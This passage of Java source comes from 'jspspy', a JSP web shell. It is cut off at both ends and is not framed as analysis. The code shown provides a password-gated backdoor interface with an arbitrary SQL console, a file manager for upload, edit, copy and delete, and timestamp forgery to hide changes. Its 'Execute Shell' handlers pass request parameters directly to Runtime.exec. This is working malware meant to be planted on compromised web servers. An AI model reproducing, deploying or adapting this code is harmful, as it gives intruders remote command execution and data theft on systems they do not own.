value=\"Connect\" type=\"submit\" size=\"100\" />" + "</p>" + "</form></table><script>changeurldriver()</script>"); } else { ((Invoker) ins.get("dbc")).invoke(request, response, JSession); } } catch (ClassCastException e) { throw e; } catch (Exception e) { throw e; } } } //DBConnect private static class DbcInvoker extends DefaultInvoker { public void invoke(HttpServletRequest request, HttpServletResponse response, HttpSession JSession) throws Exception { try { PrintWriter out = response.getWriter(); String driver = request.getParameter("driver"); String url = request.getParameter("url"); String uid = request.getParameter("uid"); String pwd = request.getParameter("pwd"); String sql = request.getParameter("sql"); String selectDb = request.getParameter("selectDb"); if (selectDb == null) selectDb = JSession.getAttribute("selectDb").toString(); else JSession.setAttribute("selectDb", selectDb); Object dbo = JSession.getAttribute(DBO); if (dbo == null || !((DBOperator) dbo).isValid()) { if (dbo != null) ((DBOperator) dbo).close(); dbo = new DBOperator(driver, url, uid, pwd, true); } else { if (!Util.isEmpty(driver) && !Util.isEmpty(url) && !Util.isEmpty(uid)) { DBOperator oldDbo = (DBOperator) dbo; dbo = new DBOperator(driver, url, uid, pwd); if (!oldDbo.equals(dbo)) { ((DBOperator) oldDbo).close(); ((DBOperator) dbo).connect(); } else { dbo = oldDbo; } } } DBOperator Ddbo = (DBOperator) dbo; JSession.setAttribute(DBO, Ddbo); if (!Util.isEmpty(request.getParameter("type")) && request.getParameter("type").equals("switch")) { Ddbo.getConn().setCatalog(request.getParameter("catalog")); } Util.outMsg(out, "Connect To DataBase Success!"); out .println(" <script type=\"text/javascript\">" + " function changeurldriver(selectDb){" + " var form = document.forms[\"form1\"];" + " if (selectDb){" + " form.elements[\"db\"].selectedIndex = selectDb" + " }" + " var v = form.elements[\"db\"].value;" + " form.elements[\"url\"].value = v.split(\"`\")[1];" + " form.elements[\"driver\"].value = v.split(\"`\")[0];" + " form.elements[\"selectDb\"].value = form.elements[\"db\"].selectedIndex;" + " }" + " </script>"); out .println("<table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\"><tr><td>" + "<form name=\"form1\" id=\"form1\" action=\"" + SHELL_NAME + "\" method=\"post\" >" + "<input type=\"hidden\" id=\"selectDb\" name=\"selectDb\" value=\"" + selectDb + "\">" + "<h2>DataBase Manager »</h2>" + "<input id=\"action\" type=\"hidden\" name=\"o\" value=\"dbc\" />" + "<p>" + "Driver:" + " <input class=\"input\" name=\"driver\" value=\"" + Ddbo.driver + "\" id=\"driver\" type=\"text\" size=\"35\" />" + "URL:" + "<input class=\"input\" name=\"url\" value=\"" + Ddbo.url + "\" id=\"url\" value=\"\" type=\"text\" size=\"90\" />" + "UID:" + "<input class=\"input\" name=\"uid\" value=\"" + Ddbo.uid + "\" id=\"uid\" value=\"\" type=\"text\" size=\"10\" />" + "PWD:" + "<input class=\"input\" name=\"pwd\" value=\"" + Ddbo.pwd + "\" id=\"pwd\" value=\"\" type=\"text\" size=\"10\" />" + "DataBase:" + " <select onchange='changeurldriver()' class=\"input\" id=\"db\" name=\"db\" >" + " <option value='com.mysql.jdbc.Driver`jdbc:mysql://localhost:3306/mysql?useUnicode=true&characterEncoding=GBK'>Mysql</option>" + " <option value='oracle.jdbc.driver.OracleDriver`jdbc:oracle:thin:@dbhost:1521:ORA1'>Oracle</option>" + " <option value='com.microsoft.jdbc.sqlserver.SQLServerDriver`jdbc:microsoft:sqlserver://localhost:1433;DatabaseName=master'>Sql Server</option>" + " <option value='sun.jdbc.odbc.JdbcOdbcDriver`jdbc:odbc:Driver={Microsoft Access Driver (*.mdb)};DBQ=C:/ninty.mdb'>Access</option>" + " <option value=' ` '>Other</option>" + " </select>" + "<input class=\"bt\" name=\"connect\" id=\"connect\" value=\"Connect\" type=\"submit\" size=\"100\" />" + "</p>" + "</form><script>changeurldriver('" + selectDb + "')</script>"); DatabaseMetaData meta = Ddbo.getConn().getMetaData(); out .println("<form action=\"" + SHELL_NAME + "\" method=\"POST\">" + "<p><input type=\"hidden\" name=\"selectDb\" value=\"" + selectDb + "\"><input type=\"hidden\" name=\"o\" value=\"executesql\"><table width=\"200\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\"><tr><td colspan=\"2\">Version : <b style='color:red;font-size:14px'><i>" + meta.getDatabaseProductName() + " , " + meta.getDatabaseProductVersion() + "</i></b><br/>URL : <b style='color:red;font-size:14px'><i>" + meta.getURL() + "</i></b><br/>Catalog : <b style='color:red;font-size:14px'><i>" + Ddbo.getConn().getCatalog() + "</i></b><br/>UserName : <b style='color:red;font-size:14px'><i>" + meta.getUserName() + "</i></b><br/><br/></td></tr><tr><td colspan=\"2\">Run SQL query/queries on database / <b><i>Switch Database :</i></b> "); out .println("<select id=\"catalogs\" onchange=\"if (this.value == '0') return;doPost({o:'executesql',type:'switch',catalog:document.getElementById('catalogs').value})\">"); out .println("<option value='0'>-- Select a DataBase --</option>"); ResultSet dbs = meta.getCatalogs(); try { while (dbs.next()) { out.println("<option value='" + dbs.getString(1) + "'>" + dbs.getString(1) + "</option>"); } } catch (Exception ex) { } dbs.close(); out .println("</select></td></tr><tr><td><textarea id=\"sql\" name=\"sql\" class=\"area\" style=\"600px;height:50px;overflow:auto;\">" + Util.htmlEncode(Util.getStr(sql)) + "</textarea><input class=\"bt\" name=\"submit\" type=\"submit\" value=\"Query\" /> <input class=\"bt\" onclick=\"doPost({o:'export',type:'queryexp',sql:document.getElementById('sql').value})\" type=\"button\" value=\"Export\" /> <input type='button' value='Export To File' class='bt' onclick=\"doPost({o:'vExport',type:'queryexp',sql:document.getElementById('sql').value})\"></td><td nowrap style=\"padding:0 5px;\"></td></tr></table></p></form></table>"); if (Util.isEmpty(sql)) { String type = request.getParameter("type"); if (Util.isEmpty(type) || type.equals("switch")) { ResultSet tbs = meta.getTables(null, null, null, null); out.println(Table.rs2Table(tbs, meta .getIdentifierQuoteString(), true)); tbs.close(); } else if (type.equals("struct")) { String tb = request.getParameter("table"); if (Util.isEmpty(tb)) return; ResultSet t = meta.getColumns(null, null, tb, null); out.println(Table.rs2Table(t, "", false)); t.close(); } } } catch (Exception e) { JSession .setAttribute( MSG, "<span style='color:red'>Some Error Occurred. Please Check Out the StackTrace Follow.</span>" + BACK_HREF); throw e; } } } private static class ExecuteSQLInvoker extends DefaultInvoker { public void invoke(HttpServletRequest request, HttpServletResponse response, HttpSession JSession) throws Exception { try { PrintWriter out = response.getWriter(); String sql = request.getParameter("sql"); String db = request.getParameter("selectDb"); Object dbo = JSession.getAttribute(DBO); if (!Util.isEmpty(sql)) { if (dbo == null || !((DBOperator) dbo).isValid()) { ((Invoker) ins.get("vConn")).invoke(request, response, JSession); return; } else { ((Invoker) ins.get("dbc")).invoke(request, response, JSession); Object obj = ((DBOperator) dbo).execute(sql); if (obj instanceof ResultSet) { ResultSet rs = (ResultSet) obj; ResultSetMetaData meta = rs.getMetaData(); int colCount = meta.getColumnCount(); out .println("<b style=\"margin-left:15px\">Query#0 : " + Util.htmlEncode(sql) + "</b><br/><br/>"); out .println("<table border=\"0\" cellpadding=\"3\" cellspacing=\"0\" style=\"margin-left:15px\"><tr class=\"head\">"); for (int i = 1; i <= colCount; i++) { out.println("<td nowrap>" + meta.getColumnName(i) + "<br><span>" + meta.getColumnTypeName(i) + "</span></td>"); } out.println("</tr>"); Table tb = new Table(); while (rs.next()) { Row r = new Row(); for (int i = 1; i <= colCount; i++) { String v = null; try { v = rs.getString(i); } catch (SQLException ex) { v = "<<Error!>>"; } r.addColumn(new Column(v)); } tb.addRow(r); } out.println(tb.toString()); out.println("</table><br/>"); rs.close(); ((DBOperator) dbo).closeStmt(); } else { out .println("<b style='margin-left:15px'>affected rows : <i>" + obj + "</i></b><br/><br/>"); } } } else { ((Invoker) ins.get("dbc")).invoke(request, response, JSession); } } catch (Exception e) { throw e; } } } private static class VLoginInvoker extends DefaultInvoker { public boolean doBefore() { return false; } public void invoke(HttpServletRequest request, HttpServletResponse response, HttpSession JSession) throws Exception { try { PrintWriter out = response.getWriter(); out .println("<html><head><title>jspspy</title><style type=\"text/css\">" + " input {font:11px Verdana;BACKGROUND: #FFFFFF;height: 18px;border: 1px solid #666666;}" + "a{font:11px Verdana;BACKGROUND: #FFFFFF;}" + " </style></head><body><form method=\"POST\" action=\"" + SHELL_NAME + "\">" + "<!--<p style=\"font:11px Verdana;color:red\">Private Edition Dont Share It !</p>-->" + " <p><span style=\"font:11px Verdana;\">Password: </span>" + " <input name=\"o\" type=\"hidden\" value=\"login\">" + " <input name=\"pw\" type=\"password\" size=\"20\">" + " <input type=\"hidden\" name=\"o\" value=\"login\">" + " <input type=\"submit\" value=\"Login\"><br/>" + "<!--<span style=\"font:11px Verdana;\">Copyright © 2010</span>--></p>" + " </form><span style='font-weight:bold;color:red;font-size:12px'></span></body></html>"); } catch (Exception e) { throw e; } } } private static class LoginInvoker extends DefaultInvoker { public boolean doBefore() { return false; } public void invoke(HttpServletRequest request, HttpServletResponse response, HttpSession JSession) throws Exception { try { String inputPw = request.getParameter("pw"); if (Util.isEmpty(inputPw) || !inputPw.equals(PW)) { ((Invoker) ins.get("vLogin")).invoke(request, response, JSession); return; } else { JSession.setAttribute(PW_SESSION_ATTRIBUTE, inputPw); response.sendRedirect(SHELL_NAME); return; } } catch (Exception e) { throw e; } } } private static class MyComparator implements Comparator { public int compare(Object obj1, Object obj2) { try { if (obj1 != null && obj2 != null) { File f1 = (File) obj1; File f2 = (File) obj2; if (f1.isDirectory()) { if (f2.isDirectory()) { return f1.getName().compareTo(f2.getName()); } else { return -1; } } else { if (f2.isDirectory()) { return 1; } else { return f1.getName().toLowerCase().compareTo( f2.getName().toLowerCase()); } } } return 0; } catch (Exception e) { return 0; } } } private static class FileListInvoker extends DefaultInvoker { public void invoke(HttpServletRequest request, HttpServletResponse response, HttpSession JSession) throws Exception { try { String path2View = null; PrintWriter out = response.getWriter(); String path = request.getParameter("folder"); String outEntry = request.getParameter("outentry"); if (!Util.isEmpty(outEntry) && outEntry.equals("true")) { JSession.removeAttribute(ENTER); JSession.removeAttribute(ENTER_MSG); JSession.removeAttribute(ENTER_CURRENT_DIR); } Object enter = JSession.getAttribute(ENTER); File file = null; if (!Util.isEmpty(enter)) { if (Util.isEmpty(path)) { if (JSession.getAttribute(ENTER_CURRENT_DIR) == null) path = "/"; else path = (String) (JSession .getAttribute(ENTER_CURRENT_DIR)); } file = new EnterFile(path); ((EnterFile) file).setZf((String) enter); JSession.setAttribute(ENTER_CURRENT_DIR, path); } else { if (Util.isEmpty(path)) path = JSession.getAttribute(CURRENT_DIR).toString(); JSession.setAttribute(CURRENT_DIR, Util.convertPath(path)); file = new File(path); } path2View = Util.convertPath(path); if (!file.exists()) { throw new Exception(path + "Dont Exists !"); } File[] list = file.listFiles(); Arrays.sort(list, new MyComparator()); out.println("<div style='margin:10px'>"); String cr = null; try { cr = JSession.getAttribute(CURRENT_DIR).toString() .substring(0, 3); } catch (Exception e) { cr = "/"; } File currentRoot = new File(cr); out.println("<h2>File Manager - Current disk "" + (cr.indexOf("/") == 0 ? "/" : currentRoot.getPath()) + "" total (unknow)</h2>"); out .println("<form action=\"" + SHELL_NAME + "\" method=\"post\">" + "<table width=\"98%\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\" style=\"margin:10px 0;\">" + " <tr>" + " <td nowrap>Current Directory <input type=\"hidden\" name=\"o\" value=\"filelist\"/></td>" + " <td width=\"98%\"><input class=\"input\" name=\"folder\" value=\"" + path2View + "\" type=\"text\" style=\"100%;margin:0 8px;\"></td>" + " <td nowrap><input class=\"bt\" value=\"GO\" type=\"submit\"></td>" + " </tr>" + "</table>" + "</form>"); out .println("<table width=\"98%\" border=\"0\" cellpadding=\"4\" cellspacing=\"0\">" + "<form action=\"" + SHELL_NAME + "?o=upload\" method=\"POST\" enctype=\"multipart/form-data\"><tr class=\"alt1\"><td colspan=\"7\" style=\"padding:5px;\">" + "<div style=\"float:right;\"><input class=\"input\" name=\"file\" value=\"\" type=\"file\" /> <input class=\"bt\" name=\"doupfile\" value=\"Upload\" " + (enter == null ? "type=\"submit\"" : "type=\"button\" onclick=\"alert('You Are In File Now ! Can Not Upload !')\"") + " /></div>" + "<a href=\"javascript:new fso({path:'" + Util.convertPath(WEB_ROOT) + "'}).subdir('true')\">Web Root</a>" + " | <a href=\"javascript:new fso({path:'" + Util.convertPath(SHELL_DIR) + "'}).subdir('true')\">Shell Directory</a>" + " | <a href=\"javascript:" + (enter == null ? "new fso({}).mkdir()" : "alert('You Are In File Now ! Can Not Create Directory ! ')") + "\">New Directory</a> | <a href=\"javascript:" + (enter == null ? "new fso({}).createFile()" : "alert('You Are In File Now ! Can Not Create File !')") + "\">New File</a>" + " | "); File[] roots = file.listRoots(); for (int i = 0; i < roots.length; i++) { File r = roots[i]; out.println("<a href=\"javascript:new fso({path:'" + Util.convertPath(r.getPath()) + "'}).subdir('true');\">Disk(" + Util.convertPath(r.getPath()) + ")</a>"); if (i != roots.length - 1) { out.println("|"); } } out.println("</td>" + "</tr></form>" + "<tr class=\"head\"><td> </td>" + " <td>Name</td>" + " <td width=\"16%\">Last Modified</td>" + " <td width=\"10%\">Size</td>" + " <td width=\"20%\">Read/Write/Execute</td>" + " <td width=\"22%\"> </td>" + "</tr>"); if (file.getParent() != null) { out .println("<tr class=alt1>" + "<td align=\"center\"><font face=\"Wingdings 3\" size=4>=</font></td>" + "<td nowrap colspan=\"5\"><a href=\"javascript:new fso({path:'" + Util.convertPath(file.getAbsolutePath()) + "'}).parent()\">Goto Parent</a></td>" + "</tr>"); } int dircount = 0; int filecount = 0; for (int i = 0; i < list.length; i++) { File f = list[i]; if (f.isDirectory()) { dircount++; out .println("<tr class=\"alt2\" onMouseOver=\"this.className='focus';\" onMouseOut=\"this.className='alt2';\">" + "<td width=\"2%\" nowrap><font face=\"wingdings\" size=\"3\">0</font></td>" + "<td><a href=\"javascript:new fso({path:'" + Util.convertPath(f.getAbsolutePath()) + "'}).subdir()\">" + f.getName() + "</a></td>" + "<td nowrap>" + Util.formatDate(f.lastModified()) + "</td>" + "<td nowrap>--</td>" + "<td nowrap>" + f.canRead() + " / " + f.canWrite() + " / unknow</td>" + "<td nowrap>"); if (enter != null) out.println(" "); else out .println("<a href=\"javascript:new fso({path:'" + Util.convertPath(f .getAbsolutePath()) + "',filename:'" + f.getName() + "'}).removedir()\">Del</a> | <a href=\"javascript:new fso({path:'" + Util.convertPath(f .getAbsolutePath()) + "'}).move()\">Move</a> | <a href=\"javascript:new fso({path:'" + Util.convertPath(f .getAbsolutePath()) + "',filename:'" + f.getName() + "'}).pack(true)\">Pack</a>"); out.println("</td></tr>"); } else { filecount++; out .println("<tr class=\"alt1\" onMouseOver=\"this.className='focus';\" onMouseOut=\"this.className='alt1';\">" + "<td width=\"2%\" nowrap><input type='checkbox' value='" + f.getName() + "'/></td>" + "<td><a href=\"javascript:new fso({path:'" + Util.convertPath(f.getAbsolutePath()) + "'}).down()\">" + f.getName() + "</a></td>" + "<td nowrap>" + Util.formatDate(f.lastModified()) + "</td>" + "<td nowrap>" + Util.getSize(f.length(), 'B') + "</td>" + "<td nowrap>" + "" + f.canRead() + " / " + f.canWrite() + " / unknow </td>" + "<td nowrap>" + "<a href=\"javascript:new fso({path:'" + Util.convertPath(f.getAbsolutePath()) + "'}).vEdit()\">Edit</a> | " + "<a href=\"javascript:new fso({path:'" + Util.convertPath(f.getAbsolutePath()) + "'}).down()\">Down</a> | " + "<a href=\"javascript:new fso({path:'" + Util.convertPath(f.getAbsolutePath()) + "'}).copy()\">Copy</a>"); if (enter == null) { out .println(" | <a href=\"javascript:new fso({path:'" + Util.convertPath(f .getAbsolutePath()) + "'}).move()\">Move</a> | " + "<a href=\"javascript:new fso({path:'" + Util.convertPath(f .getAbsolutePath()) + "'}).vEditProperty()\">Property</a> | " + "<a href=\"javascript:new fso({path:'" + Util.convertPath(f .getAbsolutePath()) + "'}).enter()\">Enter</a>"); if (f.getName().endsWith(".zip") || f.getName().endsWith(".jar")) { out .println(" | <a href=\"javascript:new fso({path:'" + Util.convertPath(f .getAbsolutePath()) + "',filename:'" + f.getName() + "'}).unpack()\">UnPack</a>"); } else if (f.getName().endsWith(".rar")) { out .println(" | <a href=\"javascript:alert('Dont Support RAR,Please Use WINRAR');\">UnPack</a>"); } else { out .println(" | <a href=\"javascript:new fso({path:'" + Util.convertPath(f .getAbsolutePath()) + "',filename:'" + f.getName() + "'}).pack()\">Pack</a>"); } } out.println("</td></tr>"); } } out .println("<tr class=\"alt2\"><td align=\"center\"> </td>" + " <td>"); if (enter != null) out .println("<a href=\"javascript:alert('You Are In File Now ! Can Not Pack !');\">Pack Selected</a> - <a href=\"javascript:alert('You Are In File Now ! Can Not Delete !');\">Delete Selected</a>"); else out .println("<a href=\"javascript:new fso({}).packBatch();\">Pack Selected</a> - <a href=\"javascript:new fso({}).deleteBatch();\">Delete Selected</a>"); out.println("</td>" + " <td colspan=\"4\" align=\"right\">" + dircount + " directories / " + filecount + " files</td></tr>" + "</table>"); out.println("</div>"); if (file instanceof EnterFile) ((EnterFile) file).close(); } catch (ZipException e) { JSession.setAttribute(MSG, "\"" + JSession.getAttribute(ENTER).toString() + "\" Is Not a Zip File. Please Exit."); throw e; } catch (Exception e) { JSession.setAttribute(MSG, "File Does Not Exist Or You Dont Have Privilege." + BACK_HREF); throw e; } } } private static class LogoutInvoker extends DefaultInvoker { public boolean doBefore() { return false; } public boolean doAfter() { return false; } public void invoke(HttpServletRequest request, HttpServletResponse response, HttpSession JSession) throws Exception { try { Object dbo = JSession.getAttribute(DBO); if (dbo != null) ((DBOperator) dbo).close(); Object obj = JSession.getAttribute(PORT_MAP); if (obj != null) { ServerSocket s = (ServerSocket) obj; s.close(); } Object online = JSession.getAttribute(SHELL_ONLINE); if (online != null) ((OnLineProcess) online).stop(); JSession.invalidate(); ((Invoker) ins.get("vLogin")).invoke(request, response, JSession); } catch (ClassCastException e) { JSession.invalidate(); ((Invoker) ins.get("vLogin")).invoke(request, response, JSession); } catch (Exception e) { throw e; } } } private static class UploadInvoker extends DefaultInvoker { public boolean doBefore() { return false; } public boolean doAfter() { return false; } public void invoke(HttpServletRequest request, HttpServletResponse response, HttpSession JSession) throws Exception { try { UploadBean fileBean = new UploadBean(); response.getWriter().println( JSession.getAttribute(CURRENT_DIR).toString()); fileBean.setSavePath(JSession.getAttribute(CURRENT_DIR) .toString()); fileBean.parseRequest(request); File f = new File(JSession.getAttribute(CURRENT_DIR) + "/" + fileBean.getFileName()); if (f.exists() && f.length() > 0) JSession .setAttribute(MSG, "<span style='color:green'>Upload File Success!</span>"); else JSession .setAttribute("MSG", "<span style='color:red'>Upload File Failed!</span>"); response.sendRedirect(SHELL_NAME); } catch (Exception e) { throw e; } } } private static class CopyInvoker extends DefaultInvoker { public void invoke(HttpServletRequest request, HttpServletResponse response, HttpSession JSession) throws Exception { try { String src = request.getParameter("src"); String to = request.getParameter("to"); InputStream in = null; Object enter = JSession.getAttribute(ENTER); if (enter == null) in = new FileInputStream(new File(src)); else { ZipFile zf = new ZipFile((String) enter); ZipEntry entry = zf.getEntry(src); in = zf.getInputStream(entry); } BufferedInputStream input = new BufferedInputStream(in); BufferedOutputStream output = new BufferedOutputStream( new FileOutputStream(new File(to))); byte[] d = new byte[1024]; int len = input.read(d); while (len != -1) { output.write(d, 0, len); len = input.read(d); } output.close(); input.close(); JSession.setAttribute(MSG, "Copy File Success!"); response.sendRedirect(SHELL_NAME); } catch (Exception e) { throw e; } } } private static class BottomInvoker extends DefaultInvoker { public boolean doBefore() { return false; } public boolean doAfter() { return false; } public void invoke(HttpServletRequest request, HttpServletResponse response, HttpSession JSession) throws Exception { try { response .getWriter() .println( "<div style=\"padding:10px;border-bottom:1px solid #fff;border-top:1px solid #ddd;background:#eee;\">Don't break my heart~" + "</div>"); } catch (Exception e) { throw e; } } } private static class VCreateFileInvoker extends DefaultInvoker { public void invoke(HttpServletRequest request, HttpServletResponse response, HttpSession JSession) throws Exception { try { PrintWriter out = response.getWriter(); String path = request.getParameter("filepath"); File f = new File(path); if (!f.isAbsolute()) { String oldPath = path; path = JSession.getAttribute(CURRENT_DIR).toString(); if (!path.endsWith("/")) path += "/"; path += oldPath; f = new File(path); f.createNewFile(); } else { f.createNewFile(); } out .println("<table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\"><tr><td>" + "<form name=\"form1\" id=\"form1\" action=\"" + SHELL_NAME + "\" method=\"post\" >" + "<h2>Create / Edit File »</h2>" + "<input type='hidden' name='o' value='createFile'>" + "<p>Current File (import new file name and new file)<br /><input class=\"input\" name=\"filepath\" id=\"editfilename\" value=\"" + path + "\" type=\"text\" size=\"100\" />" + " <select name='charset' class='input'><option value='ANSI'>ANSI</option><option value='UTF-8'>UTF-8</option></select></p>" + "<p>File Content<br /><textarea class=\"area\" id=\"filecontent\" name=\"filecontent\" cols=\"100\" rows=\"25\" ></textarea></p>" + "<p><input class=\"bt\" name=\"submit\" id=\"submit\" type=\"submit\" value=\"Submit\"> <input class=\"bt\" type=\"button\" value=\"Back\" onclick=\"history.back()\"></p>" + "</form>" + "</td></tr></table>"); } catch (Exception e) { throw e; } } } private static class VEditInvoker extends DefaultInvoker { public void invoke(HttpServletRequest request, HttpServletResponse response, HttpSession JSession) throws Exception { try { PrintWriter out = response.getWriter(); String path = request.getParameter("filepath"); String charset = request.getParameter("charset"); Object enter = JSession.getAttribute(ENTER); InputStream input = null; if (enter != null) { ZipFile zf = new ZipFile((String) enter); ZipEntry entry = new ZipEntry(path); input = zf.getInputStream(entry); } else { File f = new File(path); if (!f.exists()) return; input = new FileInputStream(path); } BufferedReader reader = null; if (Util.isEmpty(charset) || charset.equals("ANSI")) reader = new BufferedReader(new InputStreamReader(input)); else reader = new BufferedReader(new InputStreamReader(input, charset)); StringBuffer content = new StringBuffer(); String s = reader.readLine(); while (s != null) { content.append(s + "\r\n"); s = reader.readLine(); } reader.close(); out .println("<table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\"><tr><td>" + "<form name=\"form1\" id=\"form1\" action=\"" + SHELL_NAME + "\" method=\"post\" >" + "<h2>Create / Edit File »</h2>" + "<input type='hidden' name='o' value='createFile'>" + "<p>Current File (import new file name and new file)<br /><input class=\"input\" name=\"filepath\" id=\"editfilename\" value=\"" + path + "\" type=\"text\" size=\"100\" />" + " <select name='charset' id='fcharset' onchange=\"new fso({path:'" + path + "',charset:document.getElementById('fcharset').value}).vEdit()\" class='input'><option value='ANSI'>ANSI</option><option " + ((!Util.isEmpty(charset) && charset .equals("UTF-8")) ? "selected" : "") + " value='UTF-8'>UTF-8</option></select></p>" + "<p>File Content<br /><textarea class=\"area\" id=\"filecontent\" name=\"filecontent\" cols=\"100\" rows=\"25\" >" + Util.htmlEncode(content.toString()) + "</textarea></p>" + "<p>"); if (enter != null) out .println("<input class=\"bt\" name=\"submit\" id=\"submit\" onclick=\"alert('You Are In File Now ! Can Not Save !')\" type=\"button\" value=\"Submit\">"); else out .println("<input class=\"bt\" name=\"submit\" id=\"submit\" type=\"submit\" value=\"Submit\">"); out .println("<input class=\"bt\" type=\"button\" value=\"Back\" onclick=\"history.back()\"></p>" + "</form>" + "</td></tr></table>"); } catch (Exception e) { throw e; } } } private static class CreateFileInvoker extends DefaultInvoker { public boolean doBefore() { return false; } public boolean doAfter() { return false; } public void invoke(HttpServletRequest request, HttpServletResponse response, HttpSession JSession) throws Exception { try { PrintWriter out = response.getWriter(); String path = request.getParameter("filepath"); String content = request.getParameter("filecontent"); String charset = request.getParameter("charset"); BufferedWriter outs = null; if (charset.equals("ANSI")) outs = new BufferedWriter(new FileWriter(new File(path))); else outs = new BufferedWriter(new OutputStreamWriter( new FileOutputStream(new File(path)), charset)); outs.write(content, 0, content.length()); outs.close(); JSession .setAttribute( MSG, "Save File <span style='color:green'>" + (new File(path)).getName() + "</span> With <span style='font-weight:bold;color:red'>" + charset + "</span> Success!"); response.sendRedirect(SHELL_NAME); } catch (Exception e) { throw e; } } } private static class VEditPropertyInvoker extends DefaultInvoker { public void invoke(HttpServletRequest request, HttpServletResponse response, HttpSession JSession) throws Exception { try { PrintWriter out = response.getWriter(); String filepath = request.getParameter("filepath"); File f = new File(filepath); if (!f.exists()) return; String read = f.canRead() ? "checked=\"checked\"" : ""; String write = f.canWrite() ? "checked=\"checked\"" : ""; Calendar cal = Calendar.getInstance(); cal.setTimeInMillis(f.lastModified()); out .println("<table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\"><tr><td>" + "<form name=\"form1\" id=\"form1\" action=\"" + SHELL_NAME + "\" method=\"post\" >" + "<h2>Set File Property »</h2>" + "<p>Current File (FullPath)<br /><input class=\"input\" name=\"file\" id=\"file\" value=\"" + request.getParameter("filepath") + "\" type=\"text\" size=\"120\" /></p>" + "<input type=\"hidden\" name=\"o\" value=\"editProperty\"> " + "<p>" + " <input type=\"checkbox\" disabled " + read + " name=\"read\" id=\"checkbox\">Read " + " <input type=\"checkbox\" disabled " + write + " name=\"write\" id=\"checkbox2\">Write " + "</p>" + "<p>Instead »" + "year:" + "<input class=\"input\" name=\"year\" value=" + cal.get(Calendar.YEAR) + " id=\"year\" type=\"text\" size=\"4\" />" + "month:" + "<input class=\"input\" name=\"month\" value=" + (cal.get(Calendar.MONTH) + 1) + " id=\"month\" type=\"text\" size=\"2\" />" + "day:" + "<input class=\"input\" name=\"date\" value=" + cal.get(Calendar.DATE) + " id=\"date\" type=\"text\" size=\"2\" />" + "" + "hour:" + "<input class=\"input\" name=\"hour\" value=" + cal.get(Calendar.HOUR) + " id=\"hour\" type=\"text\" size=\"2\" />" + "minute:" + "<input class=\"input\" name=\"minute\" value=" + cal.get(Calendar.MINUTE) + " id=\"minute\" type=\"text\" size=\"2\" />" + "second:" + "<input class=\"input\" name=\"second\" value=" + cal.get(Calendar.SECOND) + " id=\"second\" type=\"text\" size=\"2\" />" + "</p>" + "<p><input class=\"bt\" name=\"submit\" value=\"Submit\" id=\"submit\" type=\"submit\" value=\"Submit\"> <input class=\"bt\" name=\"submit\" value=\"Back\" id=\"submit\" type=\"button\" onclick=\"history.back()\"></p>" + "</form>" + "</td></tr></table>"); } catch (Exception e) { throw e; } } } private static class EditPropertyInvoker extends DefaultInvoker { public boolean doBefore() { return false; } public boolean doAfter() { return false; } public void invoke(HttpServletRequest request, HttpServletResponse response, HttpSession JSession) throws Exception { try { String f = request.getParameter("file"); File file = new File(f); if (!file.exists()) return; String year = request.getParameter("year"); String month = request.getParameter("month"); String date = request.getParameter("date"); String hour = request.getParameter("hour"); String minute = request.getParameter("minute"); String second = request.getParameter("second"); Calendar cal = Calendar.getInstance(); cal.set(Calendar.YEAR, Integer.parseInt(year)); cal.set(Calendar.MONTH, Integer.parseInt(month) - 1); cal.set(Calendar.DATE, Integer.parseInt(date)); cal.set(Calendar.HOUR, Integer.parseInt(hour)); cal.set(Calendar.MINUTE, Integer.parseInt(minute)); cal.set(Calendar.SECOND, Integer.parseInt(second)); if (file.setLastModified(cal.getTimeInMillis())) { JSession.setAttribute(MSG, "Reset File Property Success!"); } else { JSession .setAttribute(MSG, "<span style='color:red'>Reset File Property Failed!</span>"); } response.sendRedirect(SHELL_NAME); } catch (Exception e) { throw e; } } } //VShell private static class VsInvoker extends DefaultInvoker { public void invoke(HttpServletRequest request, HttpServletResponse response, HttpSession JSession) throws Exception { try { PrintWriter out = response.getWriter(); String cmd = request.getParameter("command"); String program = request.getParameter("program"); if (cmd == null) { if (ISLINUX) cmd = "id"; else cmd = "cmd.exe /c set"; } if (program == null) program = "cmd.exe /c net start > " + SHELL_DIR + "/Log.txt"; if (JSession.getAttribute(MSG) != null) { Util.outMsg(out, JSession.getAttribute(MSG).toString()); JSession.removeAttribute(MSG); } out .println("<table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\"><tr><td>" + "<form name=\"form1\" id=\"form1\" action=\"" + SHELL_NAME + "\" method=\"post\" >" + "<h2>Execute Program »</h2>" + "<p>" + "<input type=\"hidden\" name=\"o\" value=\"shell\">" + "<input type=\"hidden\" name=\"type\" value=\"program\">" + "Parameter<br /><input class=\"input\" name=\"program\" id=\"program\" value=\"" + program + "\" type=\"text\" size=\"100\" />" + "<input class=\"bt\" name=\"submit\" id=\"submit\" value=\"Execute\" type=\"submit\" size=\"100\" />" + "</p>" + "</form>" + "<form name=\"form1\" id=\"form1\" action=\"" + SHELL_NAME + "\" method=\"post\" >" + "<h2>Execute Shell »</h2>" + "<p>" + "<input type=\"hidden\" name=\"o\" value=\"shell\">" + "<input type=\"hidden\" name=\"type\" value=\"command\">" + "Parameter<br /><input class=\"input\" name=\"command\" id=\"command\" value=\"" + cmd + "\" type=\"text\" size=\"100\" />" + "<input class=\"bt\" name=\"submit\" id=\"submit\" value=\"Execute\" type=\"submit\" size=\"100\" />" + "</p>" + "</form>" + "</td>" + "</tr></table>"); } catch (Exception e) { throw e; } } } private static class ShellInvoker extends DefaultInvoker { public void invoke(HttpServletRequest request, HttpServletResponse response, HttpSession JSession) throws Exception { try { PrintWriter out = response.getWriter(); String type = request.getParameter("type"); if (type.equals("command")) { ((Invoker) ins.get("vs")).invoke(request, response, JSession); out.println("<div style='margin:10px'><hr/>"); out.println("<pre>"); String command = request.getParameter("command"); if (!Util.isEmpty(command)) { Process pro = Runtime.getRuntime().exec(command); BufferedReader reader = new BufferedReader( new InputStreamReader(pro.getInputStream())); String s = reader.readLine(); while (s != null) { out.println(Util.htmlEncode(Util.getStr(s))); s = reader.readLine(); } reader.close(); reader = new BufferedReader(new InputStreamReader(pro .getErrorStream())); s = reader.readLine(); while (s != null) { out.println(Util.htmlEncode(Util.getStr(s))); s = reader.readLine(); } reader.close(); out.println("</pre></div>"); } } else { String program = 